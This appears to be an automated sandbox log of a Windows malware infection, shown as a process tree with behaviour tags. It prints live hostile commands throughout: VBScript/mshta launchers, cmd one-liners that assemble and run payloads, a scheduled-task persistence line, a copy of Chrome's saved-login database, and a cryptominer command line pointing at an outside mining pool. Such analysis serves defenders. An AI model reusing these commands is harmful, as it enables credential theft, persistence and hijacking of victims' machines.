C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "sF0PPpnmkNGtoshXjIcSBrPz.exe" -F10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AcE5WunU9rbhvxIHGczo1xiA.exe"C:\Users\Admin\Pictures\Adobe Films\AcE5WunU9rbhvxIHGczo1xiA.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x298,0x294,0x290,0x2bc,0x28c,0x7ff88db2dec0,0x7ff88db2ded0,0x7ff88db2dee010⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,14318272383274401953,8655748063075876082,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_864999767" --mojo-platform-channel-handle=1744 /prefetch:810⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0351a0558292.exeSun0351a0558292.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe5⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe5⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 5805⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\UzYxXqOkTtDpwSezwVXY7Exr.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
-
-
C:\Program Files (x86)\Hsnulor\updateppq.exe"C:\Program Files (x86)\Hsnulor\updateppq.exe"2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8767932.exe"C:\Users\Admin\AppData\Roaming\8767932.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\1444996.exe"C:\Users\Admin\AppData\Roaming\1444996.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\5906233.exe"C:\Users\Admin\AppData\Roaming\5906233.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\7573297.exe"C:\Users\Admin\AppData\Roaming\7573297.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript: cLosE ( CreAteoBject ( "WscRipT.SheLL" ). RuN ( "CmD /q /r COpy /y ""C:\Users\Admin\AppData\Roaming\7573297.exe"" ..\O0rNF.EXE && StarT ..\O0rNF.Exe /P2shWm1kbqdY & If """"== """" for %a In ( ""C:\Users\Admin\AppData\Roaming\7573297.exe"" ) do taskkill /iM ""%~Nxa"" -f " , 0 , TRue) )5⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r COpy /y "C:\Users\Admin\AppData\Roaming\7573297.exe" ..\O0rNF.EXE && StarT ..\O0rNF.Exe /P2shWm1kbqdY &If ""== "" for %a In ( "C:\Users\Admin\AppData\Roaming\7573297.exe" ) do taskkill /iM "%~Nxa" -f6⤵
-
C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE..\O0rNF.Exe /P2shWm1kbqdY7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript: cLosE ( CreAteoBject ( "WscRipT.SheLL" ). RuN ( "CmD /q /r COpy /y ""C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE"" ..\O0rNF.EXE && StarT ..\O0rNF.Exe /P2shWm1kbqdY & If ""/P2shWm1kbqdY ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE"" ) do taskkill /iM ""%~Nxa"" -f " , 0 , TRue) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r COpy /y "C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE" ..\O0rNF.EXE && StarT ..\O0rNF.Exe /P2shWm1kbqdY &If "/P2shWm1kbqdY "== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\O0rNF.EXE" ) do taskkill /iM "%~Nxa" -f9⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpt: CloSe ( creATEObjecT( "wsCRIpT.sHell" ). RUN ( "Cmd /C Echo | set /p = ""MZ"" > q7PV.R & Copy /y /b Q7PV.R + 21_qTAy.5T + Z8D16.1 ..\MGLZR6G.SL1 & sTArt control ..\MgLZR6G.SL1 & Del /q * " , 0 , TRuE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C Echo | set /p = "MZ" > q7PV.R & Copy /y /b Q7PV.R + 21_qTAy.5T +Z8D16.1 ..\MGLZR6G.SL1 & sTArt control ..\MgLZR6G.SL1 & Del /q *9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "10⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>q7PV.R"10⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\MgLZR6G.SL110⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\MgLZR6G.SL111⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\MgLZR6G.SL112⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\MgLZR6G.SL113⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "7573297.exe" -f7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5505137.exe"C:\Users\Admin\AppData\Roaming\5505137.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\681845.exe"C:\Users\Admin\AppData\Roaming\681845.exe"4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )4⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )7⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9204⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1c4,0x1f4,0x7ff88db2dec0,0x7ff88db2ded0,0x7ff88db2dee06⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2436 /prefetch:16⤵
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=2032 /prefetch:86⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=2016 /prefetch:86⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Modifies system certificate store
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1968 /prefetch:26⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2820 /prefetch:16⤵
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3300 /prefetch:26⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=3404 /prefetch:86⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=3300 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=3536 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=3924 /prefetch:86⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1920,12776749200641527296,5225821497630061563,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5576_191275870" --mojo-platform-channel-handle=2816 /prefetch:86⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 68 -s 15444⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun038db98f99bf9a.exeSun038db98f99bf9a.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\yTy3pjskcaOH3SGW7DDHaAqG.exe"C:\Users\Admin\Pictures\Adobe Films\yTy3pjskcaOH3SGW7DDHaAqG.exe"2⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Pictures\Adobe Films\BnaQE7vssOIGKiIFtluJLNOT.exe"C:\Users\Admin\Pictures\Adobe Films\BnaQE7vssOIGKiIFtluJLNOT.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
